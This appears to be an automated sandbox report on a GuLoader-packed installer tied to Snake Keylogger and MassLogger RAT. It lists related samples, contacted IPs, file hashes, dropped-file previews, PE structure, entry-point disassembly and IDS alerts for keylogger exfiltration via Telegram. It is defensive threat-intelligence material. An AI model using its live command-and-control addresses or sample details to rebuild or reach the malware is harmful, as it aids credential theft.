 | 2CQ2zMn0hb.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
 | 6mGpn6kupm.exe | malicious | GuLoader, MassLogger RAT | 132.226.247.73
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 104.21.96.1
 | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
 | UF7jzc7ETP.exe | malicious | MassLogger RAT | 104.21.96.1
 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
 | VQsnGWaNi5.exe | malicious | Snake Keylogger | 104.21.96.1
 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
 | JgE2YgxSzB.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
 | lsc5QN46NH.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
 | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | 104.21.96.1
3b5074b1b5d032e5620f69f9f700ff0e | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
 | Yef4EqsQha.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
 | 3j7f6Bv4FT.exe | malicious | Unknown | 149.154.167.220
 | 3j7f6Bv4FT.exe | malicious | Unknown | 149.154.167.220
 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | iRmpdWgpoF.exe | malicious | Unknown | 149.154.167.220
 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
 | iRmpdWgpoF.exe | malicious | Unknown | 149.154.167.220
 | 3pwbTZtiDu.exe | malicious | Unknown | 149.154.167.220
37f463bf4616ecd445d4a1937da06e19 | 4Vx2rUlb0f.exe | malicious | GuLoader, Snake Keylogger | 142.250.181.225, 216.58.206.46
 | b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 216.58.206.46
 | 9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 216.58.206.46
 | 6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 216.58.206.46
 | V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 216.58.206.46
 | 2CQ2zMn0hb.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 216.58.206.46
 | 6mGpn6kupm.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 216.58.206.46
 | v4nrZtP7K2.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 216.58.206.46
 | xXUnP7uCBJ.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 216.58.206.46
 | 4UQ5wnI389.exe | malicious | GuLoader, MassLogger RAT | 142.250.181.225, 216.58.206.46
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll
b5BQbAhwVD.exe | malicious | GuLoader, MassLogger RAT
9Yn5tjyOgT.exe | malicious | GuLoader, MassLogger RAT
6ZoBPR3isG.exe | malicious | GuLoader, MassLogger RAT
V7OHj6ISEo.exe | malicious | GuLoader, MassLogger RAT
2CQ2zMn0hb.exe | malicious | GuLoader, MassLogger RAT
6mGpn6kupm.exe | malicious | GuLoader, MassLogger RAT
v4nrZtP7K2.exe | malicious | GuLoader, MassLogger RAT
xXUnP7uCBJ.exe | malicious | GuLoader, MassLogger RAT
4UQ5wnI389.exe | malicious | GuLoader, MassLogger RAT
ajRZflJ2ch.exe | malicious | GuLoader, MassLogger RAT
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):484658
                                                                                                          Entropy (8bit):7.809711763657168
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                                                                          MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                                                                          SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                                                                          SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                                                                          SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0 (a libmagic signature hit on a few leading bytes; at entropy 1.25 this file looks like the other low-entropy "data" blobs dropped alongside it rather than a usable FoxPro memo file)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):139354
                                                                                                          Entropy (8bit):1.2473328695625903
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                                                                          MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                                                                          SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                                                                          SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                                                                          SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):112291
                                                                                                          Entropy (8bit):1.249420131631438
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                                                                          MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                                                                          SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                                                                          SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                                                                          SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):106104
                                                                                                          Entropy (8bit):4.610026616368888
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:IP3wTh7DRSV+79P0aNI1oQnoz7vqcpMY1E2u+LwLZhyYX:IoThXx7eaNI1FnK2hsLwL9
                                                                                                          MD5:FEF7421EF2B950A579357212A13814E0
                                                                                                          SHA1:32F3468D205DC202181D1E27BF3266923F04CA12
                                                                                                          SHA-256:89AFF9FB847E87231D9D1161094F1509F180B1B26A968410A82D215F755614A4
                                                                                                          SHA-512:3EE75C05BAECDDAEDEC8876AD4F85D0A67E3C0C4051CFD1A3E0D59C3A94B92D84FA0762A166A5B53EDEEC2AA8918C36E770D343C72891A2989A5FD49CBE9770B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.....rr........JJ.......ii...,,,,..........(....................aa.......................mmmm..........***......................................XX..............!..............................J.....ZZ................D..;;.B.8.:......z.........]..........MM................VV.c........Q....k....kk................................................>............;...h...................../............SS.H......E......iiiii.HHHH.%..........^........................................~......V.4........xx..........,,.................................."""...T.....yyyyy..BBB....6666................888............3..............................JJ...~~.........kk...................WW.====.........[[[[[.......]]].@@@............r...V......7...'.......((..............RRRR.....................#....$..D...................V.E....1....................|..YY................3333.......a........OOO.....................Z........<.............[.........]]]...............g..............D...VVVV........................
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):280856
                                                                                                          Entropy (8bit):7.788212328856588
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:BXvtGbv4RD5mE0/m97evA/V94wNLgC6iJ4dsjnRBpif:BXVIvsMpMeA/V94ZCmdkRfA
                                                                                                          MD5:9E47063807062051CA0A82BD7A4F10BE
                                                                                                          SHA1:BA22C4BE24119B1386A1B54E42EF4258233B6B67
                                                                                                          SHA-256:79D66FF49DB8E9E21D963393FEFC4F3E5139EEB212B7F53220A66D2B145BD7D6
                                                                                                          SHA-512:91536F5C93DD735DE1293303A8F132562C9CF071B8EDBF397D3338CC29C91BA7D4DB34790B207C0BD28C65F635D0376F4996888501ECED83843648CA098B6D29
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.4444......z..''........:::.KK.... ...E.................l.................H.........UUUUU......B......P.))............hh.,,............NN................zzz.....ii....................................~..................U........@@.;;.......&&...........................................................E............................ii...\\\..............QQQ..q.......YYY..-.....55......7......F........RR...............dd...................VV.......................5.............................................,.ZZZ........................... .....G.---....i......................T.......&......B...............s..........................5....b.....m.......`.a...........X.............~~...z.v........vv...M.^.....G..!......a.<...................................\...........................Q.f................................||..................&&.u.....dddd....+..................................======..........88..........\\\.GGGG.....O..................!!..v......................w."............
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):362089
                                                                                                          Entropy (8bit):1.23992084267325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                                                                          MD5:A4340182CDDD2EC1F1480360218343F9
                                                                                                          SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                                                                          SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                                                                          SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                                                                          Malicious:false
                                                                                                          Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12288
                                                                                                          Entropy (8bit):5.719859767584478
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                          MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                          SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                          SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                          SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: b5BQbAhwVD.exe, Detection: malicious, Browse
                                                                                                          • Filename: 9Yn5tjyOgT.exe, Detection: malicious, Browse
                                                                                                          • Filename: 6ZoBPR3isG.exe, Detection: malicious, Browse
                                                                                                          • Filename: V7OHj6ISEo.exe, Detection: malicious, Browse
                                                                                                          • Filename: 2CQ2zMn0hb.exe, Detection: malicious, Browse
                                                                                                          • Filename: 6mGpn6kupm.exe, Detection: malicious, Browse
                                                                                                          • Filename: v4nrZtP7K2.exe, Detection: malicious, Browse
                                                                                                          • Filename: xXUnP7uCBJ.exe, Detection: malicious, Browse
                                                                                                          • Filename: 4UQ5wnI389.exe, Detection: malicious, Browse
                                                                                                          • Filename: ajRZflJ2ch.exe, Detection: malicious, Browse
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1511591
                                                                                                          Entropy (8bit):5.466660339097473
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:QeVI0N994Mjbo3xX3y4bz2lWwWo6rSTZyDnX8:E0NP4qoBXbz2luo6rS1yz8
                                                                                                          MD5:CFD0C4C2A683850FAFD1B81CC97F2763
                                                                                                          SHA1:3155004207814F7877863A4ADD4C6258D4E84A2C
                                                                                                          SHA-256:598F31497631F543E1EA32C275BFE9C75CD3EEFF73CCABAC0C0F44938BB235D5
                                                                                                          SHA-512:95F9BA70AF2AABD8D63F6E73379C832B31351A520367A580B6FE1A45295F9C7DCBB2A9AF51DE9B0175D973AF823086FAA3FAE1D6BB945FC727421D6B728AC0B1
                                                                                                          Malicious:false
                                                                                                          Preview:X6......,.......,.......\........!.......5.......6..........................M...i............................H..............................................................................................................................................................................G...J...............h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.960601663335954
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:rXKfKM0T49.exe
                                                                                                          File size:1'034'264 bytes
                                                                                                          MD5:948a8f01fca4eecddbcb1c20b26a0a53
                                                                                                          SHA1:f1254c7c3a1051c4624072c07f725aa62ff4a316
SHA256: 28d6a2e755f646875e1ed22b6e8443e074e2fa7730d4f202ffe21c48db789fad
SHA512: 655c9aa0c0d74a7ba7e260429bc2d20d89bf9057b597f43b71ad97f4e2a925506564bc042363424a7d791e61697de361418c40a8c15608a635e0a37d48674123
SSDEEP: 24576:9jwKCNv1K8uI69d68+cOGyQA81xfEsc/fbCi1WYH/:V1CV1Fu59ZH76C8WYf
TLSH: 3E252309D880EEB2D5FB19306DE2F213B7A7B81210A1916B3762373F78B55918C5EBD4
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
Icon Hash: 46224e4c19391d03
Entrypoint: 0x4034a5
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 1f23f452093b5c1ff091a2f9fb4fa3e9
Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007FC80D1D2F73h
push ebx
call 00007FC80D1D623Dh
cmp eax, ebx
je 00007FC80D1D2F69h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007FC80D1D61B7h
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007FC80D1D2F4Ch
push 0000000Ah
call 00007FC80D1D6210h
push 00000008h
call 00007FC80D1D6209h
push 00000006h
mov dword ptr [0042A244h], eax
call 00007FC80D1D61FDh
cmp eax, ebx
je 00007FC80D1D2F71h
push 0000001Eh
call eax
test eax, eax
je 00007FC80D1D2F69h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x55000 | 0x21068 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6409 | 0x6600 | bfe2b726d49cbd922b87bad5eea65e61 | False | 0.6540287990196079 | data | 6.416186322230332 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1396 | 0x1400 | d45dcba8ca646543f7e339e20089687e | False | 0.45234375 | data | 5.154907432640367 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20358 | 0x600 | 8575fc5e872ca789611c386779287649 | False | 0.5026041666666666 | data | 4.004402321344153 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x2a000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x55000 | 0x21068 | 0x21200 | 03ed2ed76ba15352dac9e48819696134 | False | 0.8714696344339623 | data | 7.556190648348207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x554c0 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x55828 | 0xc2a3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9966684729162903
RT_ICON | 0x61ad0 | 0x86e0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.990210843373494
RT_ICON | 0x6a1b0 | 0x5085 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9867559307233299
RT_ICON | 0x6f238 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.4358921161825726
RT_ICON | 0x717e0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4896810506566604
RT_ICON | 0x72888 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5367803837953091
RT_ICON | 0x73730 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6913357400722022
RT_ICON | 0x73fd8 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.38597560975609757
RT_ICON | 0x74640 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.4934971098265896
RT_ICON | 0x74ba8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.651595744680851
RT_ICON | 0x75010 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.46908602150537637
RT_ICON | 0x752f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5472972972972973
RT_DIALOG | 0x75420 | 0x120 | data | English | United States | 0.53125
RT_DIALOG | 0x75540 | 0x118 | data | English | United States | 0.5678571428571428
RT_DIALOG | 0x75658 | 0x120 | data | English | United States | 0.5104166666666666
RT_DIALOG | 0x75778 | 0xf8 | data | English | United States | 0.6330645161290323
RT_DIALOG | 0x75870 | 0xa0 | data | English | United States | 0.6125
RT_DIALOG | 0x75910 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x75970 | 0xae | data | English | United States | 0.6091954022988506
RT_VERSION | 0x75a20 | 0x308 | data | English | United States | 0.47036082474226804
RT_MANIFEST | 0x75d28 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T23:11:47.560964+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49972 | 216.58.206.46 | 443 | TCP
2025-01-10T23:11:52.664493+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49975 | 132.226.247.73 | 80 | TCP
2025-01-10T23:11:59.398915+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49975 | 132.226.247.73 | 80 | TCP
2025-01-10T23:12:00.055572+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 49977 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:00.281914+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49977 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:01.242641+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.9 | 49978 | 132.226.247.73 | 80 | TCP
2025-01-10T23:12:01.813771+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.9 | 49979 | 149.154.167.220 | 443 | TCP
2025-01-10T23:12:02.042849+0100 | 2057744 | ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram | 1 | 192.168.2.9 | 49979 | 149.154.167.220 | 443 | TCP
